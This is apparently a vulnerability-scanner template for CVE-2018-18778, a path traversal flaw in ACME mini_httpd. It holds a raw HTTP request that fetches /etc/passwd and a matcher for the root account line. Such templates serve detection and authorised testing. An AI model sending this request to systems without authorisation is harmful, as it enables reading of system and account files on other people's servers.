id: CVE-2018-18778 info: name: mini_httpd Path Traversal author: dhiyaneshDK severity: high description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ tags: cve,cve2018,lfi requests: - raw: - |+ GET /etc/passwd HTTP/1.1 Host: Content-Length: 4 unsafe: true matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:"